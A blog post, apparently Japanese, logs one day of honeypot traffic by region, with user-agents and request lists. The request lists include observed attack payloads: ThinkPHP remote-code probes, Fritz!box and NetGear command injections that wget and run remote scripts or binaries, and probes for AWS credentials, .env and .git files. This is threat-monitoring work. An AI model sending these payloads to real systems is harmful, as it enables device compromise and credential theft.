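Konnichi Harebare to Shita Aozora (Hello, Clear Blue Sky)

With nothing better to do, I spend the whole day facing my blog, idly writing down the trifling thoughts that drift through my mind,

2019/08/10 Honeypot (tentative) observation log

This is the honeypot (tentative) observation log for 2019/08/10.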

Highlights
Region:AP

The following were observed:
Access attempts targeting ThinkPHP vulnerabilities
Suspicious traffic involving 123[.]125[.]114[.]144

Region:US

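The following were observed:
Access attempts targeting AVM Fritz!box vulnerabilities
Access attempts targeting NetGear vulnerabilities
Access attempts targeting ThinkPHP vulnerabilities
Scanning with masscan
Scanning for AWS credential information
Suspicious traffic involving 110[.]249[.]212[.]46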

Region:EU

Nothing in particular was observed.

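Access count trend

AP: total accesses: 49 (vs. previous day: -3)
US: total accesses: 30 (vs. previous day: +13)
EU: total accesses: 9 (vs. previous day: -119)

For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 requests are excluded.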

Region:AP

Source IP addresses


User-Agent list

Count UserAgent
6 -
2 curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.13.1.0zlib/1.2.3 libidn/1.18 libssh2/1.2.2
2 Go-http-client/1.1
1 Mozilla/5.01682558 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/537.36(KHTML, like Gecko) Chrome/40.0.2214.89 Safari/537.36
1 Mozilla/5.01724933 Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E302
1 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
13 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
5 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
7 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
6 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
1 python-requests/2.21.0

Request list

Count Method Request Protocol
2 CONNECT cn[.]bing[.]com:443 HTTP/1.1
4 CONNECT www[.]baidu[.]com:443 HTTP/1.1
2 CONNECT www[.]voanews[.]com:443 HTTP/1.1
1 GET ///admin/config.php HTTP/1.1
1 GET /evox/about HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /HNAP1 HTTP/1.1
2 GET http://boxun[.]com/ HTTP/1.1
2 GET http://www[.]123cha[.]com/ HTTP/1.1
2 GET http://www[.]baidu[.]com/ HTTP/1.1
2 GET http://www[.]epochtimes[.]com/ HTTP/1.1
2 GET http://www[.]ip[.]cn/ HTTP/1.1
1 GET http://www[.]minghui[.]org/ HTTP/1.1
2 GET http://www[.]rfa[.]org/english/ HTTP/1.1
2 GET http://www[.]wujieliulan[.]com/ HTTP/1.1
1 GET /nmaplowercheck1565349055 HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /server-status HTTP/1.1
2 GET /TP/index.php HTTP/1.1
2 GET /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
3 GET /TP/public/index.php HTTP/1.1
1 HEAD / HTTP/1.1
2 HEAD http://123[.]125[.]114[.]144/ HTTP/1.1
1 HEAD /robots.txt HTTP/1.0
2 HEAD /robots.txt HTTP/1.1
1 POST /sdk HTTP/1.1
2 POST /TP/index.php?s=captcha HTTP/1.1
2 \x03
1 \x16\x03\x01

Region:US

Source IP addresses


User-Agent list

Count UserAgent
7 -
2 Go-http-client/1.1
1 masscan/1.0 (https://github.com/robertdavidgraham/masscan)
1 Mozilla/5.0
1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
18 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)

Request list

Count Method Request Protocol
1 -
1 GET /.aws/credentials HTTP/1.0
1 GET /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20wget%20http://91[.]92[.]66[.]192/xd.sh%20%26 HTTP/1.1
1 GET /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%cd%20%2Ftmp%2F%3B%20wget%20http%3A%2F%2F5[.]253[.]86[.]121%2Fbins%2Farm%3B%20chmod%20777%20arm%3B%20.%2Farm%20%26 HTTP/1.1
2 GET /elrekt.php HTTP/1.1
2 GET /html/public/index.php HTTP/1.1
1 GET http://110[.]249[.]212[.]46/testget?q=23333&port=80 HTTP/1.1
2 GET /index.php HTTP/1.1
2 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /manager/html HTTP/1.1
2 GET /public/index.php HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1 HTTP/1.1
2 GET /thinkphp/html/public/index.php HTTP/1.1
2 GET /TP/html/public/index.php HTTP/1.1
2 GET /TP/index.php HTTP/1.1
2 GET /TP/public/index.php HTTP/1.1
1 HEAD /robots.txt HTTP/1.0
2 POST /index.php?s=captcha HTTP/1.1
1 \x03
1 \x16\x03\x01

Region:EU

Source IP addresses


User-Agent list

Count UserAgent
3 -
1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
1 Mozilla/5.0 (Macintosh; PPC Mac OS X; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0
1 Mozilla/5.0 (Macintosh; PPC Mac OS X; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0
1 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; pl; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 FBSMTWB
1 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.0.4) Gecko/20081029 Firefox/2.0.0.18
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36

Request list

Count Method Request Protocol
1 -
1 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /.git/index HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /mysql/admin/index.php?lang=en HTTP/1.1
1 GET /.o3mJzT HTTP/1.1
1 HEAD /robots.txt HTTP/1.0
1 \x03